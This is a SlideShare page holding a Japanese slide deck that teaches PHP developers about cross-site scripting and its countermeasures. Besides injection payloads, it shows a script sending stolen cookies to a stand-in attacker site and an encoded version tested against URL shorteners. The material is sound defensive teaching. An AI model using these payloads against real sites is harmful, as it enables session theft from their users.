Enviar búsqueda
Cargar
体系的に学ばないXSSの話
•
12 recomendaciones
•
11,664 vistas
Yutaka Maehira
Seguir
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 26
Descargar ahora
Descargar para leer sin conexión
Recomendados
とある診断員とAWS
とある診断員とAWS
zaki4649
とある診断員とSQLインジェクション
とある診断員とSQLインジェクション
zaki4649
(A7)cross site scripting
(A7)cross site scripting
OWASP Nagoya
ウェブアプリケーションセキュリティ超入門
ウェブアプリケーションセキュリティ超入門
Hiroshi Tokumaru
とある診断員と色々厄介な脆弱性達
とある診断員と色々厄介な脆弱性達
zaki4649
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
Shota Shinogi
文字コードの脆弱性はこの3年間でどの程度対策されたか?
文字コードの脆弱性はこの3年間でどの程度対策されたか?
Hiroshi Tokumaru
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
Hiroshi Tokumaru
Recomendados
とある診断員とAWS
とある診断員とAWS
zaki4649
とある診断員とSQLインジェクション
とある診断員とSQLインジェクション
zaki4649
(A7)cross site scripting
(A7)cross site scripting
OWASP Nagoya
ウェブアプリケーションセキュリティ超入門
ウェブアプリケーションセキュリティ超入門
Hiroshi Tokumaru
とある診断員と色々厄介な脆弱性達
とある診断員と色々厄介な脆弱性達
zaki4649
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
Shota Shinogi
文字コードの脆弱性はこの3年間でどの程度対策されたか?
文字コードの脆弱性はこの3年間でどの程度対策されたか?
Hiroshi Tokumaru
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
Hiroshi Tokumaru
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
CODE BLUE
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Vue.js で XSS
Vue.js で XSS
tobaru_yuta
XSS再入門
XSS再入門
Hiroshi Tokumaru
130821 owasp zed attack proxyをぶん回せ
130821 owasp zed attack proxyをぶん回せ
Minoru Sakai
文字コードに起因する脆弱性とその対策(増補版)
文字コードに起因する脆弱性とその対策(増補版)
Hiroshi Tokumaru
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
Takuto Wada
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
最近のBurp Suiteについて調べてみた
最近のBurp Suiteについて調べてみた
zaki4649
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計
Yoshinori Matsunobu
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
kazkiti
猫でもわかるかもしれない SQLインジェクション
猫でもわかるかもしれない SQLインジェクション
kinme modoki
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
Masakazu Ikeda
大規模ソーシャルゲームを支える技術~PHP+MySQLを使った高負荷対策~
大規模ソーシャルゲームを支える技術~PHP+MySQLを使った高負荷対策~
infinite_loop
Webアプリでパスワード保護はどこまでやればいいか
Webアプリでパスワード保護はどこまでやればいいか
Hiroshi Tokumaru
今さら聞けないXSS
今さら聞けないXSS
Sota Sugiura
Redisの特徴と活用方法について
Redisの特徴と活用方法について
Yuji Otani
セキュリティ未経験だったけど入社1年目から Bug Bounty Program 運営に参加してみた
セキュリティ未経験だったけど入社1年目から Bug Bounty Program 運営に参加してみた
LINE Corporation
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
abend_cve_9999_0001
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Atsushi Tanaka
安全なPHPアプリケーションの作り方2014
安全なPHPアプリケーションの作り方2014
Hiroshi Tokumaru
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
yoshinori matsumoto
Más contenido relacionado
La actualidad más candente
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
CODE BLUE
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Vue.js で XSS
Vue.js で XSS
tobaru_yuta
XSS再入門
XSS再入門
Hiroshi Tokumaru
130821 owasp zed attack proxyをぶん回せ
130821 owasp zed attack proxyをぶん回せ
Minoru Sakai
文字コードに起因する脆弱性とその対策(増補版)
文字コードに起因する脆弱性とその対策(増補版)
Hiroshi Tokumaru
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
Takuto Wada
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
最近のBurp Suiteについて調べてみた
最近のBurp Suiteについて調べてみた
zaki4649
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計
Yoshinori Matsunobu
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
kazkiti
猫でもわかるかもしれない SQLインジェクション
猫でもわかるかもしれない SQLインジェクション
kinme modoki
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
Masakazu Ikeda
大規模ソーシャルゲームを支える技術~PHP+MySQLを使った高負荷対策~
大規模ソーシャルゲームを支える技術~PHP+MySQLを使った高負荷対策~
infinite_loop
Webアプリでパスワード保護はどこまでやればいいか
Webアプリでパスワード保護はどこまでやればいいか
Hiroshi Tokumaru
今さら聞けないXSS
今さら聞けないXSS
Sota Sugiura
Redisの特徴と活用方法について
Redisの特徴と活用方法について
Yuji Otani
セキュリティ未経験だったけど入社1年目から Bug Bounty Program 運営に参加してみた
セキュリティ未経験だったけど入社1年目から Bug Bounty Program 運営に参加してみた
LINE Corporation
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
abend_cve_9999_0001
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Atsushi Tanaka
La actualidad más candente
(20)
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
Vue.js で XSS
Vue.js で XSS
XSS再入門
XSS再入門
130821 owasp zed attack proxyをぶん回せ
130821 owasp zed attack proxyをぶん回せ
文字コードに起因する脆弱性とその対策(増補版)
文字コードに起因する脆弱性とその対策(増補版)
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SQLアンチパターン 幻の第26章「とりあえず削除フラグ」
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
最近のBurp Suiteについて調べてみた
最近のBurp Suiteについて調べてみた
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
猫でもわかるかもしれない SQLインジェクション
猫でもわかるかもしれない SQLインジェクション
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
大規模ソーシャルゲームを支える技術~PHP+MySQLを使った高負荷対策~
大規模ソーシャルゲームを支える技術~PHP+MySQLを使った高負荷対策~
Webアプリでパスワード保護はどこまでやればいいか
Webアプリでパスワード保護はどこまでやればいいか
今さら聞けないXSS
今さら聞けないXSS
Redisの特徴と活用方法について
Redisの特徴と活用方法について
セキュリティ未経験だったけど入社1年目から Bug Bounty Program 運営に参加してみた
セキュリティ未経験だったけど入社1年目から Bug Bounty Program 運営に参加してみた
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Zabbix最新情報 ~Zabbix 6.0に向けて~ @OSC2021 Online/Fall
Similar a 体系的に学ばないXSSの話
安全なPHPアプリケーションの作り方2014
安全なPHPアプリケーションの作り方2014
Hiroshi Tokumaru
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
yoshinori matsumoto
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
Webセキュリティ入門(xss)
Webセキュリティ入門(xss)
KageShiron
20090218 第5回「PhpによるWebアプリケーションのセキュリティ入門」
20090218 第5回「PhpによるWebアプリケーションのセキュリティ入門」
Hiromu Shioya
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
Isao Takaesu
0511 lt
0511 lt
kataware
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー
hakoika-itwg
機械学習を使ったハッキング手法
機械学習を使ったハッキング手法
Isao Takaesu
XSSについて調べたこと
XSSについて調べたこと
iPride Co., Ltd.
お父さんのための実用JavaScriptプログラミング~入門篇~
お父さんのための実用JavaScriptプログラミング~入門篇~
Che Renkov
XXE、SSRF、安全でないデシリアライゼーション入門
XXE、SSRF、安全でないデシリアライゼーション入門
Hiroshi Tokumaru
今日こそわかる、安全なWebアプリの作り方2010
今日こそわかる、安全なWebアプリの作り方2010
Hiroshi Tokumaru
ガラケーで楽しむオレJSの勧め
ガラケーで楽しむオレJSの勧め
Hiroshi Tokumaru
次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)
Yosuke HASEGAWA
XSSについて.pdf
XSSについて.pdf
柏原 風希
20190208 脆弱性と共生するには
20190208 脆弱性と共生するには
OWASP Nagoya
Node.jsとAWS入門(Elastic Beanstalk & AWS SDK for Node.js)
Node.jsとAWS入門(Elastic Beanstalk & AWS SDK for Node.js)
崇之 清水
Railsエンジニアのためのウェブセキュリティ入門
Railsエンジニアのためのウェブセキュリティ入門
Hiroshi Tokumaru
HTML5 on ASP.NET
HTML5 on ASP.NET
Fujio Kojima
Similar a 体系的に学ばないXSSの話
(20)
安全なPHPアプリケーションの作り方2014
安全なPHPアプリケーションの作り方2014
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
Webセキュリティ入門(xss)
Webセキュリティ入門(xss)
20090218 第5回「PhpによるWebアプリケーションのセキュリティ入門」
20090218 第5回「PhpによるWebアプリケーションのセキュリティ入門」
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
0511 lt
0511 lt
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー
機械学習を使ったハッキング手法
機械学習を使ったハッキング手法
XSSについて調べたこと
XSSについて調べたこと
お父さんのための実用JavaScriptプログラミング~入門篇~
お父さんのための実用JavaScriptプログラミング~入門篇~
XXE、SSRF、安全でないデシリアライゼーション入門
XXE、SSRF、安全でないデシリアライゼーション入門
今日こそわかる、安全なWebアプリの作り方2010
今日こそわかる、安全なWebアプリの作り方2010
ガラケーで楽しむオレJSの勧め
ガラケーで楽しむオレJSの勧め
次世代プラットフォームのセキュリティモデル考察(前編)
次世代プラットフォームのセキュリティモデル考察(前編)
XSSについて.pdf
XSSについて.pdf
20190208 脆弱性と共生するには
20190208 脆弱性と共生するには
Node.jsとAWS入門(Elastic Beanstalk & AWS SDK for Node.js)
Node.jsとAWS入門(Elastic Beanstalk & AWS SDK for Node.js)
Railsエンジニアのためのウェブセキュリティ入門
Railsエンジニアのためのウェブセキュリティ入門
HTML5 on ASP.NET
HTML5 on ASP.NET
Último
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
Toru Tamaki
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
Hiroshi Tomioka
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
atsushi061452
新人研修 後半 2024/04/26の勉強会で発表されたものです。
新人研修 後半 2024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NTT DATA Technology & Innovation
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
CRI Japan, Inc.
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
CRI Japan, Inc.
Observabilityは従来型の監視と何が違うのか(キンドリルジャパン社内勉強会:2022年10月27日発表)
Observabilityは従来型の監視と何が違うのか(キンドリルジャパン社内勉強会:2022年10月27日発表)
Hiroshi Tomioka
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
Toru Tamaki
Último
(11)
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
新人研修 後半 2024/04/26の勉強会で発表されたものです。
新人研修 後半 2024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
Observabilityは従来型の監視と何が違うのか(キンドリルジャパン社内勉強会:2022年10月27日発表)
Observabilityは従来型の監視と何が違うのか(キンドリルジャパン社内勉強会:2022年10月27日発表)
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
体系的に学ばないXSSの話
1.
体系的に学ばない XSSの話
2.
XSSとは
3.
XSS(クロスサイト・スクリプティング) ● Webアプリケーションのセキュリティホール ● 悪意のあるコードをユーザに送ってしまう脆弱性 ●
動的にWebページを生成する箇所で発生 ● HTMLエスケープ漏れを利用した攻撃 ● サイト全体の1カ所でもXSS脆弱性があると被害を受ける
4.
HTMLエスケープ メタ文字 変換後 < < >
> & & " " ' ' ← こんな感じで表示するため
5.
XSSの例
6.
https://example.jp/search?word=Java <div>指定したキーワード : <?php echo($_GET['word']); ?> </div> CakePHPとかだと・・・ $this->request->data('word');
7.
https://example.jp/search? word=Java<script>alert(1) </script>
8.
https://example.jp/search? word=Java<script>alert(1)</script> <div>指定したキーワード : Java<script>alert(1)</script> </div>
9.
なにが問題か?
10.
● Cookieが盗まれる ● 個人情報が盗まれる ●
勝手に操作される ● 他いろいろ
11.
現実的な攻撃の流れ
12.
1.XSS入りの、ECサ イトへのURLを投稿 2chとか 攻撃者 ECサイトとか (https://test.ec.com) しょぼい掲示板サイト (http://syoboi.com) Cookieを投稿 3.攻撃スクリプト が実行される 投稿者:xxxxxxx メッセージ: Xs3Loa9J3iK42KPlqS76 投稿者:xxxxxxx メッセージ: Zk0oQis6N2lkqJu8MaxC ・・・ 利用者 2.XSS入りのURL経由で ECサイトにアクセス (※既にログイン済みである必要がある) var xhr =
new XMLHttpRequest(); xhr.open('GET', 'http://syoboi.com/post?p='+document.cooki); xhr.send(null);
13.
● HTMLの要素内容や、属性値を動的に出力する場 合は、「<」、「>」、「&」、「"」、「'」をエスケープする PHPでは、htmlspecialchars()関数 CakePHPでは、h()関数や、Formヘルパーを利用 ※デフォルトでは、htmlspecialcharsは「'」をエスケープせず、 h()関数は全てエスケープする htmlspecialcharsには、ENT_QUOTESを引数として渡すように徹底してもよいかも! ●
属性値はダブルクォートで囲む <input type="text" name="x" value="<?php echo $x ?>"> 対策方法・・・の一部
14.
脆弱性が発生する例
15.
<?php $mail =
$_GET['mail']; ?> <input type="text" name="mail" value="<?php echo $mail ?>"> <input type="text" name="mail" value="1"> <script>alert(document.cookie)</script>"> 動的に要素や属性値を出力するときは、「<」、「>」、「&」、「"」、 「'」を必ずエスケープする 「1"><script>alert(document.cookie)</script>」
16.
<?php $mail =
htmlspecialchars($_GET['mail'], ENT_QUOTES); ?> <input type=text name=mail value=<?php echo $mail ?>> <input type=text name=mail value=1 onmouseover=alert(document.cookie)> 属性値は必ず、「"」や「'」の引用符で囲みましょう ※「"」で囲むことを推奨 「1 onmouseover=alert(document.cookie)」
17.
<a href="javascript:alert(document.cookie)">クリックしてね </a> <?php $url
= htmlspecialchars($_GET['url'],ENT_QUOTES); ?> <a href="<?php echo $url ?>">クリックしてね</a> a要素のhref属性、img、frame、iframe要素のsrc属性は、 http、httpsスキームであることをチェックし、URLをホワイトリ ストにするなどの対策をする 「javascript:alert(document.cookie)」
18.
<?php $param =
htmlspecialchars($_GET['param'], ENT_QUOTES); ?> <... onclick="methodA('<?php $param ?>')"> <... onclick="methodA(''); alert(document.cookie)//')"> イベントハンドラ系は文字参照が解釈されてしまい、alertが実 行される JavaScriptの文字列リテラルとしてエスケープしてから、 HTMLエスケープする必要がある 「');alert(document.cookie)//」
19.
対策まとめ+α
20.
● HTMLの要素内容や、属性値を動的に出力する場 合は、「<」、「>」、「&」、「"」、「'」をエスケープする PHPでは、htmlspecialchars()関数 CakePHPでは、h()関数や、Formヘルパーを利用 ※デフォルトでは、htmlspecialcharsは「'」をエスケープせず、 h()関数は全てエスケープする htmlspecialcharsには、ENT_QUOTESを引数として渡すように徹底してもよいかも! ●
属性値はダブルクォートで囲む <input type="text" name="x" value="<?php echo $x ?>">
21.
● aタグやimgタグなどのURL動的生成は、以下のよ うな対策を行った上で、HTMLエスケープする ・ホワイトリスト形式にする ・http、httpsスキームであることをチェックする ● onclickなどのイベントハンドラは、JavaScriptとし てエスケープした上で、HTMLエスケープする ●
script要素内の動的生成は、JavaScriptとしてエ スケープし、「</」が出力されないようにする
22.
● HTTPレスポンスに文字エンコーディングを明示 する header('Content-Type: text/html;
charset=UTF-8'); ● DBに格納されているデータを利用する場合も同 様の対処をする(格納型 XSS) ● JavaScriptで動的にHTMLを生成する場合もエス ケープを忘れない(DOM Based XSS)
23.
保険的対策
24.
● CookieのHttpOnly属性を設定 JavaScriptからCookieを参照できなくする php.ini → session.cookie_httponly =
on ● ブラウザのXSSフィルタ機能を頼る →却下。
25.
余談・・・
26.
http://test.ec.com?param=%3Cscript%3Evar%20xhr% 20=%20new%20XMLHttpRequest%28%29;xhr.open% 28%27GET%27,%20%27http://shoboi.com/post? param=aaa%27,%20true%29;xhr.withCredentials% 20=%20true;xhr.send%28null%29;%3C/script%3E http://p.tl/CDiR (pixiv) → リクエスト成功 http://ul.lc/348u → リクエスト成功 http://goo.gl/nfXC0 (Google) → レスポンスがエラーになる http://inf.to/ → 作成時にエラー http://ux.nu/ (GEHIRN) → 危険なURLと判定されたため短縮できませんでした
Descargar ahora